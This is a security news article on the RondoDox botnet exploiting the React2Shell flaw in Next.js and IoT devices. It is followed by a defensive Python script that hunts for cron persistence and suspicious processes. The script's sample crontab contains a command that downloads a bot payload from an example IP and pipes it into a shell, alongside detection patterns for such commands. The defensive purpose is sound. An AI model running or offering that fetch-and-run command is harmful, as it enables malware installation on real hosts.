Cybersecurity researchers have uncovered a persistent RondoDox botnet campaign that has targeted Internet of Things devices and web applications for more than nine months and now exploits recently disclosed vulnerabilities in React Server Components and Next.js. The campaign, active through December 2025, leverages the critical React2Shell flaw, CVE-2025-55182, which carries the maximum CVSS score of 10.0 and allows unauthenticated attackers to execute arbitrary code remotely on vulnerable servers. CloudSEK highlighted the scale of the exposure, reporting that over 90,000 instances remain reachable worldwide, with the United States alone hosting more than 68,000 of them, followed by Germany, France, and India.
RondoDox, which emerged in early 2025, has expanded its capabilities over the months, adding N-day vulnerabilities such as CVE-2023-1389 and CVE-2025-24893 to its exploit toolkit. Earlier reporting from Darktrace, Kaspersky, and VulnCheck had already documented attempts to exploit React2Shell to propagate the botnet. The campaign appears to have progressed through three phases: reconnaissance and manual vulnerability scans in March and April 2025; daily mass probing of popular web platforms including WordPress, Drupal, and Struts2, as well as IoT devices such as Wavlink routers; and, by mid-2025, automated large-scale deployments that continued hourly until early December.
In the latest detected activity, the attackers first identified vulnerable Next.js servers and then deployed malicious payloads: cryptocurrency miners served from the /nuts/poop path, a botnet loader and health checker under /nuts/bolts, and a Mirai botnet variant under /nuts/x86. The /nuts/bolts component is particularly aggressive: it terminates competing malware and coin miners before fetching the primary bot binary from the command-and-control infrastructure. Some variants have also been observed removing existing botnets, Docker-based payloads, remnants of previous campaigns, and their associated cron jobs, and establishing persistence by writing to /etc/crontab. A loop that continuously scans the /proc directory kills any process not on the bot's whitelist roughly every 45 seconds, reducing the chance that rival actors reinfect the host.
Security specialists recommend that organizations immediately update Next.js and React Server Components to the patched releases, segment IoT devices into dedicated VLANs, deploy Web Application Firewalls, and closely monitor hosts for unusual process activity, such as the periodic killing of legitimate processes described above. Blocking known command-and-control servers associated with RondoDox further reduces exposure. As botnet campaigns increasingly exploit both web application frameworks and IoT devices, proactive monitoring and rapid patching remain critical to limiting their spread and impact.
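The persistence and process-killing behaviour described for the /nuts/bolts loader, and the "monitor for unusual process activity" advice above, translate into two concrete host checks: inspect /etc/crontab for entries that fetch and run remote code, and walk /proc for processes whose executable lives in a world-writable directory or has been unlinked from disk. The following script is an added example written for this page, not code from the article or from any of the vendors it cites. The /nuts/ paths come from the article; the download-and-pipe and temp-directory patterns, the sample crontab and the sample process table are constructed assumptions for illustration.

```python
"""Hunt for cron persistence and suspicious processes on a Linux host.

Added example for this page (not the article's or any vendor's code).
The /nuts/ payload paths are from the article; every other indicator and
all sample data below are constructed assumptions.
"""
import os
import re
from dataclasses import dataclass

# Payload paths named in the article.
KNOWN_PAYLOAD_PATHS = ("/nuts/poop", "/nuts/bolts", "/nuts/x86")

# Assumed generic indicators: a cron command that pipes a download into a
# shell, or anything executing from a world-writable directory.
DOWNLOAD_AND_RUN = re.compile(r"\b(wget|curl)\b[^|;&]*\|\s*(sh|bash)\b")
TMP_EXEC = re.compile(r"(^|\s)/(tmp|dev/shm|var/tmp)/\S+")


@dataclass
class Finding:
    source: str   # "crontab" or "pid <n>"
    detail: str   # the offending command or executable
    reason: str


def parse_crontab(text):
    """Yield (schedule, user, command) from system-crontab text, skipping
    comments, blank lines and VAR=value assignments."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^[A-Za-z_]\w*=", line):
            continue
        if line.startswith("@"):                 # @reboot user command
            parts = line.split(None, 2)
            if len(parts) == 3:
                yield parts[0], parts[1], parts[2]
        else:                                    # m h dom mon dow user command
            parts = line.split(None, 6)
            if len(parts) == 7:
                yield " ".join(parts[:5]), parts[5], parts[6]


def find_suspicious_cron(text):
    """Flag crontab commands that match the persistence indicators."""
    findings = []
    for _sched, _user, cmd in parse_crontab(text):
        if any(p in cmd for p in KNOWN_PAYLOAD_PATHS):
            findings.append(Finding("crontab", cmd, "references known payload path"))
        elif DOWNLOAD_AND_RUN.search(cmd):
            findings.append(Finding("crontab", cmd, "downloads and pipes into a shell"))
        elif TMP_EXEC.search(cmd):
            findings.append(Finding("crontab", cmd, "executes from a world-writable directory"))
    return findings


def snapshot_proc(proc_root="/proc"):
    """Collect pid, resolved exe link and cmdline for every process in /proc."""
    entries = []
    for name in os.listdir(proc_root):
        if not name.isdigit():
            continue
        base = os.path.join(proc_root, name)
        try:
            exe = os.readlink(os.path.join(base, "exe"))
        except OSError:
            exe = ""   # kernel thread, or no permission to read the link
        try:
            with open(os.path.join(base, "cmdline"), "rb") as f:
                cmdline = f.read().replace(b"\0", b" ").decode(errors="replace").strip()
        except OSError:
            cmdline = ""
        entries.append({"pid": int(name), "exe": exe, "cmdline": cmdline})
    return entries


def find_suspicious_procs(procs):
    """Flag processes whose binary was unlinked, runs from a temp directory,
    or whose command line references a known payload path."""
    findings = []
    for p in procs:
        src = f"pid {p['pid']}"
        if p["exe"].endswith("(deleted)"):
            findings.append(Finding(src, p["exe"], "executable unlinked from disk"))
        elif TMP_EXEC.search(p["exe"]):
            findings.append(Finding(src, p["exe"], "runs from a world-writable directory"))
        elif any(k in p["cmdline"] for k in KNOWN_PAYLOAD_PATHS):
            findings.append(Finding(src, p["cmdline"], "references known payload path"))
    return findings


# Constructed sample data (not captured from a real host).
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
@reboot root /tmp/.x/bolts
* * * * * root wget -q http://203.0.113.5/nuts/bolts -O- | sh
"""
SAMPLE_PROCS = [
    {"pid": 1, "exe": "/usr/lib/systemd/systemd", "cmdline": "/sbin/init"},
    {"pid": 842, "exe": "/usr/bin/node", "cmdline": "node server.js"},
    {"pid": 1337, "exe": "/tmp/.x/bolts (deleted)", "cmdline": "/tmp/.x/bolts"},
    {"pid": 1340, "exe": "/dev/shm/x86", "cmdline": "./x86 -c 203.0.113.5"},
]

if __name__ == "__main__":
    for f in find_suspicious_cron(SAMPLE_CRONTAB) + find_suspicious_procs(SAMPLE_PROCS):
        print(f"[{f.source}] {f.reason}: {f.detail}")
    if os.path.isdir("/proc"):   # live check on a Linux host
        for f in find_suspicious_procs(snapshot_proc()):
            print(f"[live {f.source}] {f.reason}: {f.detail}")
```

Run it as root on a Linux host to read every process's exe link; unprivileged runs see only the caller's own processes. Because the loader kills competing processes on a roughly 45-second cycle, a repeated snapshot (for example from a cron job of its own, written outside /etc/crontab so the bot does not remove it) that diffs consecutive process tables is the natural follow-up to the one-shot scan shown here.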
Follow the SPIN IDG WhatsApp Channel for updates across the Smart Pakistan Insights Network covering all of Pakistan’s technology ecosystem.